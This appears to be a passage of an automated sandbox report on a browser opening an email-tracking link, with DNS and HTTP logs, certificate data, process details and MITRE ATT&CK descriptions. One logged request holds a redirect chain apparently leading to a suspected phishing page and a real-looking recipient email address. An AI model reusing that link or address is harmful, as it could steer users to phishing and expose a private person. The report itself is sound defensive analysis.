May 10, 2021 18:53:34.306303024 CEST	65298	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:34.355354071 CEST	53	65298	8.8.8.8	192.168.2.4
May 10, 2021 18:53:35.129820108 CEST	59123	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:35.190958023 CEST	53	59123	8.8.8.8	192.168.2.4
May 10, 2021 18:53:35.314198017 CEST	54531	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:35.349667072 CEST	49714	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:35.371325016 CEST	53	54531	8.8.8.8	192.168.2.4
May 10, 2021 18:53:35.399482012 CEST	53	49714	8.8.8.8	192.168.2.4
May 10, 2021 18:53:35.949764967 CEST	58028	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:36.013551950 CEST	53	58028	8.8.8.8	192.168.2.4
May 10, 2021 18:53:36.227812052 CEST	53097	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:36.278266907 CEST	53	53097	8.8.8.8	192.168.2.4
May 10, 2021 18:53:36.595541954 CEST	49257	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:36.663429022 CEST	53	49257	8.8.8.8	192.168.2.4
May 10, 2021 18:53:37.099092007 CEST	62389	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:37.159456968 CEST	53	62389	8.8.8.8	192.168.2.4
May 10, 2021 18:53:37.898554087 CEST	49910	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:37.960100889 CEST	53	49910	8.8.8.8	192.168.2.4
May 10, 2021 18:53:38.344808102 CEST	55854	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:38.397469997 CEST	53	55854	8.8.8.8	192.168.2.4
May 10, 2021 18:53:39.158415079 CEST	64549	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:39.213568926 CEST	53	64549	8.8.8.8	192.168.2.4
May 10, 2021 18:53:39.952724934 CEST	63153	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:40.001430035 CEST	53	63153	8.8.8.8	192.168.2.4
May 10, 2021 18:53:40.733364105 CEST	52991	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:40.782814980 CEST	53	52991	8.8.8.8	192.168.2.4
May 10, 2021 18:53:41.588814020 CEST	53700	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:41.638925076 CEST	53	53700	8.8.8.8	192.168.2.4
May 10, 2021 18:53:51.671500921 CEST	51726	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:51.729602098 CEST	53	51726	8.8.8.8	192.168.2.4
May 10, 2021 18:54:03.960602999 CEST	56794	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:04.018601894 CEST	53	56794	8.8.8.8	192.168.2.4
May 10, 2021 18:54:04.629854918 CEST	56534	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:04.693352938 CEST	53	56534	8.8.8.8	192.168.2.4
May 10, 2021 18:54:04.984421015 CEST	56794	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:05.033195972 CEST	53	56794	8.8.8.8	192.168.2.4
May 10, 2021 18:54:05.748861074 CEST	56534	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:05.800493002 CEST	53	56534	8.8.8.8	192.168.2.4
May 10, 2021 18:54:06.029792070 CEST	56794	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:06.087157965 CEST	53	56794	8.8.8.8	192.168.2.4
May 10, 2021 18:54:06.820935011 CEST	56534	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:06.881403923 CEST	53	56534	8.8.8.8	192.168.2.4
May 10, 2021 18:54:08.221613884 CEST	56794	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:08.271239042 CEST	53	56794	8.8.8.8	192.168.2.4
May 10, 2021 18:54:08.858304977 CEST	56534	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:08.909878969 CEST	53	56534	8.8.8.8	192.168.2.4
May 10, 2021 18:54:12.286931992 CEST	56794	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:12.338670015 CEST	53	56794	8.8.8.8	192.168.2.4
May 10, 2021 18:54:12.968754053 CEST	56534	53	192.168.2.4	8.8.8.8
May 10, 2021 18:54:13.023065090 CEST	53	56534	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 10, 2021 18:53:35.129820108 CEST	192.168.2.4	8.8.8.8	0x9b56	Standard query (0)	email-tracking.infobip.com	A (IP address)	IN (0x0001)
May 10, 2021 18:53:35.314198017 CEST	192.168.2.4	8.8.8.8	0x245e	Standard query (0)	zutwholesale.com	A (IP address)	IN (0x0001)
May 10, 2021 18:53:35.949764967 CEST	192.168.2.4	8.8.8.8	0x750b	Standard query (0)	t.dripemail2.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 10, 2021 18:53:35.190958023 CEST	8.8.8.8	192.168.2.4	0x9b56	No error (0)	email-tracking.infobip.com	18.198.163.56	A (IP address)	IN (0x0001)
May 10, 2021 18:53:35.190958023 CEST	8.8.8.8	192.168.2.4	0x9b56	No error (0)	email-tracking.infobip.com	18.198.218.66	A (IP address)	IN (0x0001)
May 10, 2021 18:53:35.371325016 CEST	8.8.8.8	192.168.2.4	0x245e	No error (0)	zutwholesale.com	23.227.38.32	A (IP address)	IN (0x0001)
May 10, 2021 18:53:36.013551950 CEST	8.8.8.8	192.168.2.4	0x750b	No error (0)	t.dripemail2.com	100.24.77.241	A (IP address)	IN (0x0001)
May 10, 2021 18:53:36.013551950 CEST	8.8.8.8	192.168.2.4	0x750b	No error (0)	t.dripemail2.com	204.236.211.143	A (IP address)	IN (0x0001)
May 10, 2021 18:53:36.013551950 CEST	8.8.8.8	192.168.2.4	0x750b	No error (0)	t.dripemail2.com	54.158.215.14	A (IP address)	IN (0x0001)
May 10, 2021 18:53:36.013551950 CEST	8.8.8.8	192.168.2.4	0x750b	No error (0)	t.dripemail2.com	52.2.227.251	A (IP address)	IN (0x0001)
May 10, 2021 18:53:36.013551950 CEST	8.8.8.8	192.168.2.4	0x750b	No error (0)	t.dripemail2.com	34.205.150.168	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

email-tracking.infobip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49724	18.198.163.56	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2021 18:53:35.251573086 CEST	200	OUT	GET /email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: email-tracking.infobip.com Connection: Keep-Alive
May 10, 2021 18:53:35.302500010 CEST	201	IN	HTTP/1.1 302 Date: Mon, 10 May 2021 16:53:35 GMT Location: https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https://t.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9 Server: SMS API Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	18.198.163.56	80	192.168.2.4	49725	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2021 18:53:45.281322002 CEST	442	IN	HTTP/1.0 408 Request Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 10, 2021 18:53:35.469118118 CEST	23.227.38.32	443	192.168.2.4	49727	CN=zutwholesale.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Apr 01 10:28:12 CEST 2021 Wed Oct 07 21:21:40 CEST 2020	Wed Jun 30 10:28:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
May 10, 2021 18:53:35.469118118 CEST	23.227.38.32	443	192.168.2.4	49727	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
May 10, 2021 18:53:35.475578070 CEST	23.227.38.32	443	192.168.2.4	49726	CN=zutwholesale.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Apr 01 10:28:12 CEST 2021 Wed Oct 07 21:21:40 CEST 2020	Wed Jun 30 10:28:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
May 10, 2021 18:53:35.475578070 CEST	23.227.38.32	443	192.168.2.4	49726	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
May 10, 2021 18:53:36.339982986 CEST	100.24.77.241	443	192.168.2.4	49730	CN=dripemail2.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Sun Feb 07 01:00:00 CET 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Wed Mar 09 00:59:59 CET 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034
May 10, 2021 18:53:36.340435028 CEST	100.24.77.241	443	192.168.2.4	49729	CN=dripemail2.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Sun Feb 07 01:00:00 CET 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Wed Mar 09 00:59:59 CET 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage

• iexplore.exe
• iexplore.exe

Click to jump to process

Memory Usage

• iexplore.exe
• iexplore.exe

Click to jump to process

Behavior

• iexplore.exe
• iexplore.exe

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 5892 Parent PID: 800

Function Logs

General

Start time:	18:53:32
Start date:	10/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6a46d0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Process Activities

Process Information Set

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Language or Locale ID Queried

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Window UI Enumerated

Show Windows behavior

Network Activities

Show Windows behavior

Object Security Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: iexplore.exe PID: 660 Parent PID: 5892

Function Logs

General

Start time:	18:53:33
Start date:	10/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5892 CREDAT:17410 /prefetch:2
Imagebase:	0x3e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Show Windows behavior

Network Activities

Show Windows behavior

Object Security Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

Compliance:

Networking:

System Summary:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: iexplore.exe PID: 5892 Parent PID: 800

General

File Activities

File Opened

File Created

File Written

File Read

File Attributes Queried

Directory Queried

Volume Information Queried

Device IO

Section Activities

Sections loaded by Windows

Registry Activities

Key Opened

Key Value Created

Key Value Modified